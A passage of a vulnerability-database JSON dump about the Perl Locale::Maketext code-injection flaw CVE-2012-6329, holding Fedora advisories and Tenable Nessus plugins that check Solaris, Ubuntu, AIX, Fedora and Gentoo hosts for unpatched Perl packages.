scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2013-03-22T00:48:54", "published": "2013-03-22T00:48:54", "id": "FEDORA:2394F21ABD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: perl-5.16.2-240.fc18", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329", "CVE-2013-1667"], "description": "Perl is a high-level programming language with roots in C, sed, awk and she ll scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A la rge proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2013-04-03T04:55:43", "published": "2013-04-03T04:55:43", "id": "FEDORA:8ABCA212D1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: perl-5.14.4-224.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "description": "Remote code execution vulnerability in TWiki\n\nVulnerability Type: Remote Command Execution", "modified": "2013-04-02T00:00:00", "published": "2013-01-13T00:00:00", "id": "E-304", "href": "", "type": "dsquare", "title": "TWiki 5.1.2 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-17T14:01:08", "description": "The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The _compile function in Maketext.pm in the\n Locale::Maketext implementation in Perl before 5.17.7\n does not properly handle backslashes and fully qualified\n method names during compilation of bracket notation,\n which allows context-dependent attackers to execute\n arbitrary commands via crafted input to an application\n that accepts translation strings from users, as\n demonstrated by the TWiki application before 5.1.3, and\n the Foswiki application 1.0.x through 1.0.10 and 1.1.x\n through 1.1.6. (CVE-2012-6329)", "edition": 24, "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : perl-58 (cve_2012_6329_code_injection1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": "2015-01-19T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.1", "p-cpe:/a:oracle:solaris:perl-58"], "id": "SOLARIS11_PERL-58_20130716.NASL", "href": "https://www.tenable.com/plugins/nessus/80730", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80730);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-6329\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : perl-58 (cve_2012_6329_code_injection1)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The _compile function in Maketext.pm in the\n Locale::Maketext implementation in Perl before 5.17.7\n does not properly handle backslashes and fully qualified\n method names during compilation of bracket notation,\n which allows context-dependent attackers to execute\n arbitrary commands via crafted input to an application\n that accepts translation strings from users, as\n demonstrated by the TWiki application before 5.1.3, and\n the Foswiki application 1.0.x through 1.0.10 and 1.1.x\n through 1.1.6. (CVE-2012-6329)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2012-6329-code-injection-vulnerability-in-perl-58\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7f277a95\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11.1.7.5.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:perl-58\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^perl-58$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-58\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.1.7.0.5.0\", sru:\"SRU 11.1.7.5.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : perl-58\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"perl-58\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:26:27", "description": "It was discovered that Perl's Locale::Maketext module incorrectly\nhandled backslashes and fully qualified method names. An attacker\ncould possibly use this flaw to execute arbitrary code when an\napplication used untrusted templates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "published": "2014-02-06T00:00:00", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 12.10 : perl vulnerability (USN-2099-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": "2014-02-06T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:perl-modules", "cpe:/o:canonical:ubuntu_linux:12.10", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2099-1.NASL", "href": "https://www.tenable.com/plugins/nessus/72366", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2099-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72366);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56950);\n script_xref(name:\"USN\", value:\"2099-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 12.10 : perl vulnerability (USN-2099-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Perl's Locale::Maketext module incorrectly\nhandled backslashes and fully qualified method names. An attacker\ncould possibly use this flaw to execute arbitrary code when an\napplication used untrusted templates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2099-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-modules package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:perl-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 12.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"perl-modules\", pkgver:\"5.10.1-8ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"perl-modules\", pkgver:\"5.14.2-6ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"perl-modules\", pkgver:\"5.14.2-13ubuntu0.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:18:39", "description": "The version of Perl on the remote host is affected by a code execution\nvulnerability. \n\nThe _compile function in Locale::Maketext in Perl before 5.17.7 does\nnot properly handle backslashes and fully qualified method names\nduring compilation of bracket notation. This could allow context-\ndependent attackers to execute arbitrary commands via crafted input.", "edition": 29, "published": "2014-04-28T00:00:00", "title": "AIX Perl Advisory : perl_advisory4.asc", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": "2014-04-28T00:00:00", "cpe": ["cpe:/a:perl:perl", "cpe:/o:ibm:aix"], "id": "AIX_PERL_ADVISORY4.NASL", "href": "https://www.tenable.com/plugins/nessus/73735", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory perl_advisory4.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73735);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56852);\n\n script_name(english:\"AIX Perl Advisory : perl_advisory4.asc\");\n script_summary(english:\"Checks the version of the perl package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote AIX host has a vulnerable version of Perl.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Perl on the remote host is affected by a code execution\nvulnerability. \n\nThe _compile function in Locale::Maketext in Perl before 5.17.7 does\nnot properly handle backslashes and fully qualified method names\nduring compilation of bracket notation. This could allow context-\ndependent attackers to execute arbitrary commands via crafted input.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=aixbp\");\n script_set_attribute(attribute:\"solution\", value:\n\"A fix is available, and it can be downloaded from the AIX website.\nFor AIX 5.3 or AIX 6.1, use perl61.zip, and for AIX 7.1 use\nperl71.zip.\n\nIMPORTANT : If possible, it is recommended that a mksysb backup of the\nsystem be created. Verify it is both bootable and readable before\nproceeding. \n\nTo preview the fix installation :\n\n installp -apYd . perl\n\nTo install the fix package :\n\n installp -aXYd . perl\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:perl:perl\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/28\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\ninclude(\"aix.inc\");\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\noslevel = get_kb_item_or_exit(\"Host/AIX/version\");\nif ( oslevel != \"AIX-5.3\" && oslevel != \"AIX-6.1\" && oslevel != \"AIX-7.1\" )\n{\n oslevel = ereg_replace(string:oslevel, pattern:\"-\", replace:\" \");\n audit(AUDIT_OS_NOT, \"AIX 5.3 / 6.1 / 7.1\", oslevel);\n}\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nflag = 0;\n\nif (aix_check_package(release:\"5.3\", ml:\"12\", package:\"perl.rte\", minpackagever:\"5.8.8.0\", maxpackagever:\"5.8.8.123\", fixpackagever:\"5.8.8.124\") > 0) flag++;\nif (aix_check_package(release:\"6.1\", ml:\"07\", package:\"perl.rte\", minpackagever:\"5.8.8.0\", maxpackagever:\"5.8.8.122\", fixpackagever:\"5.8.8.123\") > 0) flag++;\nif (aix_check_package(release:\"6.1\", ml:\"08\", package:\"perl.rte\", minpackagever:\"5.8.8.0\", maxpackagever:\"5.8.8.244\", fixpackagever:\"5.8.8.245\") > 0) flag++;\nif (aix_check_package(release:\"6.1\", ml:\"09\", package:\"perl.rte\", minpackagever:\"5.8.8.0\", maxpackagever:\"5.8.8.366\", fixpackagever:\"5.8.8.367\") > 0) flag++;\nif (aix_check_package(release:\"7.1\", ml:\"01\", package:\"perl.rte\", minpackagever:\"5.10.1.0\", maxpackagever:\"5.10.1.100\", fixpackagever:\"5.10.1.101\") > 0) flag++;\nif (aix_check_package(release:\"7.1\", ml:\"02\", package:\"perl.rte\", minpackagever:\"5.10.1.0\", maxpackagever:\"5.10.1.150\", fixpackagever:\"5.10.1.151\") > 0) flag++;\nif (aix_check_package(release:\"7.1\", ml:\"03\", package:\"perl.rte\", minpackagever:\"5.10.1.0\", maxpackagever:\"5.10.1.200\", fixpackagever:\"5.10.1.201\") > 0) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : aix_report_get()\n );\n}\nelse\n{\n tested = aix_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl.rte\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:11:14", "description": "Fix double-free when loading Digest::SHA object representing the\nintermediate SHA state from a file (RT#82655)\n\nThe following command should be run without any errors.\n\nperl -MDigest::SHA -e ", "edition": 19, "published": "2013-02-19T00:00:00", "title": "Fedora 17 : perl-5.14.3-221.fc17 (2013-1836)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": "2013-02-19T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:perl", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2013-1836.NASL", "href": "https://www.tenable.com/plugins/nessus/64673", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-1836.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64673);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56950);\n script_xref(name:\"FEDORA\", value:\"2013-1836\");\n\n script_name(english:\"Fedora 17 : perl-5.14.3-221.fc17 (2013-1836)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix double-free when loading Digest::SHA object representing the\nintermediate SHA state from a file (RT#82655)\n\nThe following command should be run without any errors.\n\nperl -MDigest::SHA -e 'my $d = Digest::SHA->new(256); $d->load('x');'\nFix Locale::Maketext vulnerability allowing to cross-call functions\nfrom message catalogs (CVE-2012-6329).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=884354\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/098991.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ef791a17\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected perl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"perl-5.14.3-221.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:56:24", "description": "The remote host is affected by the vulnerability described in GLSA-201410-02\n(Perl, Perl Locale-Maketext module: Multiple vulnerabilities)\n\n Two vulnerabilities have been reported in the Locale-Maketext module for\n Perl, which can be exploited by malicious users to compromise an\n application using the module.\n The vulnerabilities are caused due to the “_compile()” function not\n properly sanitising input, which can be exploited to inject and execute\n arbitrary Perl code.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 23, "published": "2014-10-13T00:00:00", "title": "GLSA-201410-02 : Perl, Perl Locale-Maketext module: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": "2014-10-13T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:perl", "cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:Locale-Maketext"], "id": "GENTOO_GLSA-201410-02.NASL", "href": "https://www.tenable.com/plugins/nessus/78384", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201410-02.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78384);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56852);\n script_xref(name:\"GLSA\", value:\"201410-02\");\n\n script_name(english:\"GLSA-201410-02 : Perl, Perl Locale-Maketext module: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201410-02\n(Perl, Perl Locale-Maketext module: Multiple vulnerabilities)\n\n Two vulnerabilities have been reported in the Locale-Maketext module for\n Perl, which can be exploited by malicious users to compromise an\n application using the module.\n The vulnerabilities are caused due to the “_compile()” function not\n properly sanitising input, which can be exploited to inject and execute\n arbitrary Perl code.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201410-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All users of the Locale-Maketext module should upgrade to the latest\n version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=perl-core/Locale-Maketext-1.230.0'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:Locale-Maketext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", 